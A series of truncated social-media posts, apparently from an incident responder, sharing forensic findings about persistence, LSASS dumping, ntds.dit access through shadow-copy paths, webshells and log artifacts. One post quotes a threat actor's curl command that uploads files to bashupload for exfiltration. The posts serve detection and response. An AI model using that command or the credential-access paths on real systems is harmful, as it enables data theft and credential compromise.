This might come in handy as an "Evidence of Execution" artifact, although I'm not sure when exactly DCOM will log this entry (example below from a recent case, showcasing the execution of Advanced IP Scanner by the attacker): Source: Microsoft-Windows-DistributedCOM Event ID:

This might be a niche persistence mechanism, but during an investigation, I stumbled upon the following file on a Linux server: /home/<user>/.config/autostart/set_trusted.desktop With the following content: [Desktop Entry] Encoding=UTF-8 Exec=/usr/bin/set_trusted.sh Name=Set

I successfully tested a LSASS dumping technique on a Windows 10 lab machine, which we encountered on a recent Incident Response engagement (no EDR, default Defender installed). The "MiniDumpWriteDump" technique, as described here [1], was successful in writing the LSASS process

As I'm about to present about Linux Rootkits at the 10th edition of EuskalHack (🎉), here’s a nifty trick to detect a userland rootkit that tries to hide its presence by blocking access to /etc/ld.so.preload. We are mounting the filesystem with debugfs (an interactive file

If I were to start a new job at a company, and if I have one (security-related) wish .. If I could pick anything, I’d ask for a clear naming convention for all computers and servers. Additionally, I’d want DHCP and security logs to be stored centrally in a SIEM system. That way,

During various Ivanti Endpoint Manager Mobile investigations (CVE-2025-4428), we (as others in our field) saw that the threat actors dumped heap memory from the Tomcat Java processes using jcmd, in order to search the dumped data for sensitive information. Have others seen this

The screenshot below is from a recent Incident Response case, investigated by my colleague Flo Scheiber. The user "printer" suddenly sprang to life because an attacker brute-forced the VPN login (without Multi-Factor Authentication). This was not the first time a "printer"

An attacker downloaded a freely available webshell from GitHub and stored it under the installation path of the legitimate SAP installation in the recent SAP Visual Composer exploitation, "disguised" as a PHPMyAdmin file (see image). The code itself is relatively simple,

We just released MemProcFS-Analyzer v1.2.0 with various enhancements. Check out the changelog for more information. Happy Memory Analysis! #MemProcFS #MemoryAnalysis #DFIR github.com/LETHAL-FORENSI…

A teammate of mine worked on an interesting incident where the attackers connected to the backup server via RDP, launched the Chrome browser, and searched on Google for "VirtualBox". The VirtualBox installer was then downloaded to the home directory of the compromised user:

Yesterday, I presented "Anti-Forensic" techniques for Windows and Linux at the Troopers conference in Heidelberg. This morning at breakfast, I was approached by an attendee and asked if I had looked at the zapper tool from The Hacker's Choice. [1] I said no, but of course, my

🛬👨‍🏫🛫🔁 I love being a speaker. I also love meeting people, hearing their thoughts, and exchanging ideas. While I was enjoying tapas in the charming old town of Donostia-San Sebastián, I had a lengthy conversation with an elderly gentleman from Glasgow. One of his statements

Remote Connection from 30.1.40[.]64 😱 or not 🤔 After a second look, it turned out, that the customer is using a public IP addressing scheme for internal hosts 🙊 As somebody wrote on the Cisco forum: "Such addressing scheme looks really messy for me, but maybe there are

Ever heard of shellbags? Like in the example here: My Computer -> ? -> Users -> <compromised_user> -> ADRecon-Report-20250225235831 Shellbags are a subset of data found within UsrClass.dat and sometimes in the NTUSER.DAT hive. They are used by Windows to remember folder view

During a recent incident response case, we observed the following file access: \\localhost\C$\@ GMT-2025.06.21-10.53.43\Windows\NTDS\ntds.dit This is a clever method of accessing a Volume Shadow Copy (VSS) snapshot. Many EDR and detection systems typically monitor for commands

In a recent incident response case, threat actors escalated from a compromised Ivanti appliance to full Domain Admin privileges in under eight minutes (..!). Once the backdoor was successfully deployed on the Ivanti appliance, the threat actors leveraged their access to request

During a recent Incident Response case, we observed the threat actor exfiltrating data to the platform bashupload[.]com, which enables easy file uploads via a simple cURL command: curl bashupload[.]com -T your_file.txt Notably, Palo Alto highlighted this service in a February

Dear attacker, Clear-History does not clear the PSReadLine command history file. Clear-History, as taken from the official documentation, deletes only entries from the PowerShell session command history. In contrast, the PSReadLine module stores a history file that contains

What I learnt today: When NetScan is executed with the ‘Check for write access’ option enabled, a ‘delete[.]me’ file is created then deleted on discovered shares. [1] Thanks, The DFIR Report - this is exactly what we are seeing in a recent case. I owe you one 🍻 [1]

Awesome read & technique - well done 👏 𝘐𝘯 𝘵𝘩𝘪𝘴 𝘣𝘭𝘰𝘨 𝘱𝘰𝘴𝘵, 𝘸𝘦 𝘵𝘢𝘭𝘬𝘦𝘥 𝘢𝘣𝘰𝘶𝘵 𝘢 𝘩𝘰𝘸 𝘢 𝘸𝘦𝘭𝘭-𝘬𝘯𝘰𝘸𝘯 𝘵𝘦𝘤𝘩𝘯𝘪𝘲𝘶𝘦 𝘧𝘰𝘳 𝘦𝘯𝘥𝘱𝘰𝘪𝘯𝘵 𝘱𝘦𝘳𝘴𝘪𝘴𝘵𝘦𝘯𝘤𝘦, 𝘤𝘢𝘯 𝘣𝘦 𝘳𝘦-𝘪𝘯𝘷𝘦𝘯𝘵𝘦𝘥 𝘪𝘯 𝘢 𝘤𝘭𝘰𝘶𝘥 𝘦𝘯𝘷𝘪𝘳𝘰𝘯𝘮𝘦𝘯𝘵